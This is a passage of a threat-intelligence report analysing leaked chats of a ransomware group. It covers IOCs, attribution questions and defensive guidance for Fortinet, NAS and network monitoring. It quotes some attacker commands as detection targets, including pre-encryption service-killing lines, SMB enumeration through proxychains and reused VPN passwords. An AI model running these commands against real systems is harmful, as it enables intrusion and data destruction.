We assess the corpus as predominantly authentic based on the following indicators:

• Internal consistency across 22 room exports: timestamps, usernames, operational references, and cross-room citations are coherent and mutually reinforcing
• The Gentlemen publicly confirmed the Rocket.Chat compromise on May 4, 2026, acknowledged the leaked password is genuine, and attributed the breach to the 4VPS hosting provider incident
• Victim identities, domain names, and network artifacts extracted from the chats correlate with independently verifiable data (RansomLook DLS records, public corporate information, FortiGate device fingerprints)
• Operational artifacts (screenshots, configuration dumps, tool paths) contain internally consistent metadata (timestamps, filesystem structures, browser state) that would be extremely difficult to fabricate at scale
• The level of mundane operational detail (hardware shopping, payment disputes, frustrated troubleshooting) is consistent with genuine internal communications rather than constructed narratives

However, the following integrity risks cannot be fully excluded:

• Selective omission: The leaker may have withheld rooms or messages that would alter analytical conclusions. The absence of major operational channels (PODBOR, TOOLS, PHISHING, general) confirms the export is selective — whether by access limitation or deliberate curation is unknown
• Targeted insertion: Individual messages or screenshots could theoretically have been injected into the CSV exports prior to release. No cryptographic signatures or Rocket.Chat export verification hashes accompany the data
• Timestamp manipulation: CSV-based exports lack server-side integrity guarantees. While timestamps are internally consistent, they could have been systematically shifted or selectively edited
• Screenshot provenance: Screenshots are not cryptographically bound to the chat logs. They could originate from different timeframes, different actors, or different operations than the room exports suggest

9.2 Corpus Coverage Limitations

The 22 exported Rocket.Chat rooms represent a partial window into a significantly larger operation:

• The group has been active since at least July/August 2025, with the first public DLS post on September 9, 2025. The corpus covers only November 2025 through late April 2026 — approximately 6 months of a 10+ month operation
• RansomLook records attribute 400+ publicly claimed victims to The Gentlemen. The 66 confirmed victims identified in this corpus represent approximately 16% of the known victim pool
• At least 15 operational channels referenced in chat messages were not included in the export (PODBOR, INFO, general, TOOLS, PHISHING, and 10+ victim-specific group channels). The actual volume of internal communications is likely an order of magnitude larger than the 3,366 messages analysed
• The exported rooms skew toward operator/affiliate DM pairs rather than functional channels, meaning targeting pipelines, phishing operations, and infrastructure management are underrepresented

Consequently, all quantitative findings in this report (victim counts, tool mention frequencies, message volumes) should be treated as lower bounds, not comprehensive totals.

9.3 Analytical Assumptions

The following assumptions are applied throughout this report:

1. Attribution of usernames to roles is based on message content, volume, room presence, and behavioural patterns — not on verified real-world identities. A single person may operate multiple accounts, or multiple people may share an account
2. Tool references do not confirm deployment. A GitHub link shared in chat indicates awareness and possible intent, not confirmed operational use, unless corroborated by screenshots, victim artifacts, or verbatim deployment commands
3. Operator claims are not taken at face value for financial figures, victim counts, or capability assertions unless independently corroborated. Where unverified claims are included (e.g., zeta88's “800 BTC” cash-out history), they are presented as operator statements, not confirmed facts
4. Geographic and cultural inferences (e.g., language patterns, AI tool preferences, greeting customs) are noted as circumstantial indicators only and do not constitute attribution. Multiple explanations exist for each such observation
5. Victim identification relies on domain names, IP addresses, hostnames, and ZoomInfo references found in the corpus. In some cases, generic hostnames or common infrastructure could lead to misattribution. Confidence tiers for individual victims are documented in the separate Victim Dossier
6. RansomLook cross-referencing is based on domain-level matching against public API data. Victims not publicly claimed on a DLS, or claimed under variant spellings/domains, may not appear in the overlap analysis

9.4 Classification and Handling

This report is intended for public release with the exception of the Internal/LEA Victimology Pack (linked separately), which contains unredacted victim identifiers, network artifacts, and credential material restricted to law enforcement and vetted incident response partners. Indicators of compromise (Bitcoin addresses, Tox IDs, .onion addresses, file hashes) are included in the public version to enable defensive action.

10. Conclusion and Outlook

The compromise of The Gentlemen's Rocket.Chat infrastructure provides one of the most granular views into a mid-tier RaaS operation to date. Across 3,366 messages and 22 exported rooms, the leaked corpus exposes the full operational lifecycle — from Fortinet target scanning and CVE exploitation through credential harvesting, lateral movement, data exfiltration, and ransomware deployment — executed by a tightly entangled network of at least 9 operators.

What distinguishes this leak is the degree of interconnection it reveals. Members do not operate in isolation: zeta88 orchestrates across 18 of 22 rooms, forwarding credentials from hastalamuerte's external brokering, coordinating with qbit on infrastructure and exploit sourcing, tasking Protagor and Wick on intrusions, and managing Kunder's sub-team for G-BOT development and Fortinet exploitation. The room structure itself — DM pairs, per-victim channels, shared tooling discussions — maps a professional division of labor modeled on legitimate software operations, complete with custom C2 development (G-BOT), competitive benchmarking against rival RaaS programs, and AI-assisted negotiation workflows.

Critically, this is only a partial leak. The 22 exported rooms represent a fraction of the group's operational infrastructure. Key channels — including PODBOR (target selection, referenced 10 times), PHISHING (21 references), TOOLS, and at least 11 per-victim group channels — were not included in the export. The 66 independently confirmed victims are therefore a lower bound; the group's internal victim database, maintained in the undumped PODBOR channel, is almost certainly larger. The group itself dismissed the leak as “indeed very partial — which is actually sad,” and the evidence supports that characterization.

Despite this partial window, the corpus uncovers operational secrets that would ordinarily remain invisible: group-branded VPN passwords reused across victims, hardware procurement from Russian consumer marketplaces, infrastructure linkages to Black Basta's Matrix homeserver, active monitoring of their own leak-site rankings, and candid competitive assessments of rival RaaS programs. The group's response — announcing locker improvements, new NAS infrastructure, and operational continuity within hours — signals an organization that treats exposure as a temporary inconvenience rather than an existential threat.

For the CTI community, this leak provides actionable intelligence at every layer: network defenders gain detection signatures and IOCs; law enforcement gains identity linkages and infrastructure mappings; and the broader security community gains insight into how a modern RaaS operation scales from 40 victims in Q4 2025 to over 160 in Q1 2026. The Gentlemen remain operationally active. The caravan, as they put it, moves on — but it now moves in considerably more light.

11. Responsible Disclosure Considerations

The leaked data contains active credentials for multiple organisations. Affected entities have been identified and coordinated disclosure is underway through appropriate national CERT channels and relevant international law enforcement partners.

12. Open Questions

12.1 Who Is the Leaker?

The n345 account had zero reputation on PwnForums (created May 2026, 2 posts). The three-day gap between the $10K sale attempt and the free release suggests either no buyer materialised or the monetisation was performative. Most critically, The Gentlemen posted their response on May 4 — one day before n345's public sale post — implying advance warning, prior contact from the leaker, or private circulation of the data before the forum posts. The selective omission of major channels (PODBOR, PHISHING, TOOLS) could reflect access limitations from the 4VPS compromise, or deliberate filtering — but by whom, and to what end?

12.2 G-BOT Provenance

The G-BOT Control Panel shows significant development investment — web UI, beacon management, per-beacon SOCKS5, a builder with payload hosting integration. The PID file path /var/run/gbot_root.pid does not match any known public C2 framework. Is this a ground-up custom build by Kunder, a heavily modified fork of a lesser-known framework, or a purchased tool? The absence of any public match for its distinctive artifacts leaves this unresolved.

12.3 bestflowers247.online — Full Attribution

Cloudflare Cloudforce One attributes this Matrix homeserver to Black Basta. The Gentlemen's operators possessed screenshots from it. The Matrix handles (@usernamegg, @lapa, Tinker) perform the same operational functions visible in the Black Basta leaked corpus. But the full domain-to-infrastructure attribution chain — registration history, hosting overlaps, certificate linkages — has not been independently published. Can this homeserver be confirmed as Black Basta infrastructure through sources independent of the Cloudflare reporting?

12.4 Systematic Re-Victimisation

One confirmed cross-group case exists (South African municipality: LockBit5 December 2025, The Gentlemen March 2026). DeadBolt and DiskStation Security ransom notes appear on NAS devices The Gentlemen subsequently accessed. Is the group deliberately targeting previously compromised organisations — leveraging weak security posture and demonstrated willingness to pay — or is this coincidental overlap driven by the same vulnerable device populations? zeta88's awareness of a victim's prior payment history during negotiations (“your organisation already pay 100k for some group”) suggests at minimum that prior compromise history informs their strategy, even if deliberate re-targeting is not yet confirmed.

12.5 hastalamuerte Cross-Group Activity

The serial affiliate path (Embargo → LockBit → Medusa → Qilin → The Gentlemen) is documented. The open question is whether hastalamuerte maintains simultaneous affiliations — functioning as an access broker selling to multiple RaaS programs concurrently rather than moving sequentially between them. The $48K Qilin payment dispute provides a public departure timestamp, but it does not exclude ongoing relationships with other programs. If confirmed, it would mean that a single operator's target pipeline feeds multiple ransomware brands, and that disrupting one brand does not eliminate the underlying threat.

12.6 DiskStation & DeadBolt — Prior Compromise Indicators

Both pre-existing ransom note wallet addresses on NAS devices accessed by The Gentlemen show zero transactions — the original victims did not pay. Are The Gentlemen systematically scanning for devices with existing ransom notes as indicators of weak security posture, or is this incidental to their broader NAS exploitation campaign? The PODBOR channel, if it surfaces, would likely resolve this.

13. Infrastructure and IOCs

13.1 Onion Addresses

Other .onion addresses referenced (role unknown / inferred)

The following additional Tor endpoints are referenced in the corpus; roles below are best-effort inferences based on URL structure and naming and should be treated as tentative.

13.2 Operator VPN Credentials (for victim access)

13.3 Malware Hashes

13.4 Crypto Indicators

Note: “Diskstation Security” and “DeadBolt Team” note brands were observed in screenshots on victim systems and are not otherwise present as The Gentlemen branding in the chat corpus.

13.5 File Indicators

13.6 Operator Desktop Artifacts

Browser tabs and bookmarks observed on operator screenshots:

• Vaultwarden (password manager)
• _zabbix-mol/Dashboard (monitoring)
• SA6400 - Synology NAS (bookmarked)
• RAZBOR (bookmarked — “analysis” in Russian)
• FIRSTMAIL (bookmarked)

14. Defensive Recommendations and Detection Guidance

The following recommendations are derived directly from the TTPs, tooling, and infrastructure patterns documented in this report. They are designed to be actionable for SOC teams, threat hunters, and infrastructure owners — particularly those running Fortinet perimeter devices.

14.1 Perimeter Hardening (Fortinet Priority)

• Patch CVE-2024-55591 immediately. This is the group's confirmed primary initial access vector. All FortiOS/FortiProxy versions affected by this authentication bypass must be updated. See Fortinet PSIRT advisory FG-IR-24-535.
• Rotate all FortiGate local user passwords and LDAP bind credentials. The leak demonstrates that FortiGate configuration exports containing plaintext passwords and LDAP bind DNs are routinely shared between affiliates. If your FortiGate config has ever been exported or backed up to a potentially compromised system, treat all embedded credentials as burned.
• Audit FortiGate SSL VPN access logs for connections using openconnect --protocol=fortinet with the root username and passwords matching the group's convention: gentlemen25, Gentlemen25, gentle26. These are reused across unrelated victims.
• Disable or restrict SSL VPN access to known IP ranges where possible. The group connects via Tor, Amnezia VPN, and SOCKS proxy chains — connections from anonymising infrastructure to SSL VPN endpoints on non-standard ports (:10443, :8443, :4433) are high-confidence indicators.
• Review config user ldap stanzas in FortiGate configurations for plaintext bind passwords. Rotate any LDAP service account credentials found there and restrict bind account permissions to read-only minimum.

14.2 Network Detection — Lateral Movement and Pivoting

• Monitor for SOCKS proxy traffic on non-standard ports. The group uses external SOCKS5 proxies (e.g., port 36067) and G-BOT beacon SOCKS ports (30001, 30002). Alert on internal hosts establishing SOCKS connections to external IPs on unusual ports, particularly when correlated with subsequent SMB enumeration.
• Detect proxychains + nxc patterns. The group's primary lateral movement pattern is proxychains nxc smb <subnet>/24 — mass SMB enumeration routed through proxy chains. Look for:
  • Rapid sequential SMB connection attempts across a /24 from a single source
  • SMB auth attempts using the same credential pair against many hosts in rapid succession
  • Network traffic consistent with proxy-chained connections (SOCKS handshake followed by SMB)
• Alert on SSH dynamic port forwarding. The command ssh -NfD 1080 opens a local SOCKS proxy on port 1080. Monitor for SSH sessions with no interactive shell (the -N flag) and subsequent traffic routed through 127.0.0.1:1080.
• Watch for chisel / chisel-ng tunnels. These create TCP/SOCKS tunnels over HTTP. Detect by monitoring for long-lived HTTP connections with bidirectional data transfer patterns inconsistent with normal web traffic.

14.3 Endpoint Detection — File and Process Indicators

14.4 Pre-Encryption Behaviour Detection

The group runs service-killing scripts before encryption. Monitor for the following command sequences in rapid succession on a single host:

docker stop $(docker ps -q)
pkill -9 qemu
sudo pkill -9 -f "qemu-system"
sudo systemctl stop $(systemctl list-units --type=service | grep -iE 'mysql|maria...')

Detection logic: Alert on any process that sequentially terminates Docker containers, QEMU/KVM VMs, and database services within a short window. This pattern is a strong pre-encryption indicator — legitimate admin operations rarely kill all three service categories together.

Hyper-V targeting: The group also targets Hyper-V volume manager interfaces directly, encrypting at the hypervisor level to bypass guest-level EDR. Monitor for unusual access to Hyper-V virtual disk files (.vhdx, .avhdx) by non-Hyper-V processes, and alert on bulk virtual disk dismount or modification operations.

14.5 Exfiltration Detection

• Monitor for rclone execution and network patterns. The group uses rclone for cloud-based exfiltration. Detect by:
  • Process execution of rclone.exe or rclone on endpoints where it is not expected
  • High-volume outbound transfers to cloud storage providers (MEGA, Google Drive, Backblaze, etc.) from servers or workstations
  • rclone user-agent strings in proxy/firewall logs
• Alert on LimeWire staging URLs. The group uses limewire.com/d/ URLs for payload hosting and internal file sharing. Block or alert on outbound connections to limewire.com from server infrastructure.
• Monitor temp.sh and 0x0.st. These legitimate anonymous file-sharing services are abused by the G-BOT builder to host payloads. Alert on outbound uploads to these domains from non-user endpoints.

14.6 Identity and Credential Monitoring

• Monitor Snusbase and similar breach-lookup services. The group uses Snusbase to look up credentials against victim domains. Alert on DNS queries or HTTP connections to snusbase.com from corporate networks.
• Detect password spraying patterns against domain controllers. The group pivots from LDAP bind credentials to password spraying. Alert on:
  • Multiple failed authentication attempts from a single source against many accounts
  • LDAP bind attempts using FortiGate service account credentials from non-FortiGate source IPs
• Monitor for Velociraptor MSI deployments. The group deploys Velociraptor v0.76 as a C2 via MSI packages. Alert on unexpected MSI installations of Velociraptor (velociraptor.msi or similar) on endpoints where it is not part of the authorised DFIR toolkit.

14.7 NAS and Synology-Specific Guidance

The group actively targets Synology NAS devices with a dedicated Linux locker binary:

• Restrict DSM admin access to management VLANs only. Do not expose DSM (port 5000/5001) to the internet or to general user segments.
• Monitor for unexpected binary creation in /opt/ — the locker binary path is /opt/updateamd.
• Alert on mass file encryption patterns on NAS volumes — sequential rename operations appending .i8p14s across shared volumes.
• Review SSH access to NAS devices. The group uses SSH to deploy and execute the locker. Disable SSH on NAS devices where it is not required; where required, restrict to key-based authentication from known management hosts.
• Check for pre-existing compromise. The leak shows the group encountering DeadBolt and DiskStation Security ransom notes on NAS devices they access — indicating that internet-exposed NAS devices may already have been compromised by other groups. Audit NAS devices for existing ransom notes or encrypted files.

14.8 Threat Intelligence Integration

The following IOCs should be ingested into SIEM, EDR, and threat intelligence platforms:

• Hash blocklists: SetupGps2.exe SHA-256 91017846dd71fbbfcd40f116aca8d4c66f51583cb26fa9a54de0e1f08c9cd40f (MD5: bdfae4ff271414df8db7bfd255cf603e)
• Network IOCs: SOCKS5 proxy IP 91.245.35.22:36067; operator VPN IPs from Section 13.2; .onion addresses from Section 13.1
• BTC wallet monitoring: 1CgfAohwbTSYsyxPvphdcrcfSd1XE5C8Rr, bc1qgl29fwvpaky7vr94qwufeq56d00l5h60fe7utx
• Email IOC: [email protected]
• Tox IDs: Group operational Tox F8E24C7F5B12CD69C44C73F438F65E9BF560ADF35EBBDF92CF9A9B84079F8F04060FF98D098E
• File patterns: README-GENTLEMEN*, *.i8p14s, /opt/updateamd, /var/run/gbot_root.pid
• VPN password patterns: gentlemen25, Gentlemen25, gentle26 — if these appear in authentication logs, the device has been or is being targeted by this group

15. MITRE ATT&CK Mapping

Each technique is grouped by operational phase and linked to specific evidence from the leaked corpus — operator commands, room references, and tool deployments. Where verbatim commands or quotes are available, they are cited directly.

Phase 1 — Reconnaissance

Phase 2 — Initial Access

Phase 3 — Credential Access

Phase 4 — Discovery and Lateral Movement

Phase 5 — Persistence and Command & Control

Phase 6 — Collection and Exfiltration

Phase 7 — Impact

16. Operational Commands Reference

All entries are verbatim from the corpus. 64 entries across 17 rooms, attributed to 6 of 9 identified operators.

VPN Access Commands (13)

Recon/Scan Commands (4)

Tunnel/Proxy Commands (5)

SMB/AD Commands (19)

WinRM/RDP (2)

SSH Tunneling (1)

Credential Dumping / Execution (2)

C2/Beacon (1)

Locker Commands (9)

Note: Two different locker passwords observed: wbwNZteb (room 133148, January) and 3kVOuyhF (room 843543, March). The Windows variant is locker.exe/locker, the Linux/NAS variant is /opt/updateamd or /opt/update. Flags include --superfast, --ultrafast, --full, --system, --keep.

17. Detection Rules and Hunting Queries for Post-Exploitation

17.1 Process and Command Line Detection

Monitor for known post-exploitation frameworks, unusual argument patterns, and cleanup commands.

17.2 PowerShell and Scripting Detection

Focus on inline downloads, array-based file staging, and unusual script block structures.

17.3 Network and HTTP/HTTPS Traffic Detection

Track outbound staging, non-standard ports, and bulk HTTP requests from workstation endpoints.

17.4 File System and Artifact Detection

Monitor for suspicious staging folders, unexpected DLL placements, and report generation.

17.5 SMB and Lateral Movement Detection

Detect remote command execution and file transfer patterns consistent with automated tools.

17.6 Detection Resources — Yara and Signature Rules

Full suite of Yara and Sigma compatible rules are available on our GitHub page for The Gentlemen Leaks.

18. Full Operational Timeline Log (Nov 2025 – Apr 2026)

Appendices

The following data files accompany this report is in our GitHub repository zip password protected:

• Fortinet_targets.csv — 98 deduplicated FortiGate device entries
• All_links.csv — 435 URLs extracted from the corpus
• External_actors.csv — 39 external handle/brand references
• Commands_table.md — All operational commands with room/date/user attribution

This report is based exclusively on analysis of the leaked corpus. Claims by The Gentlemen operators are reproduced for intelligence purposes and are not independently verified unless stated.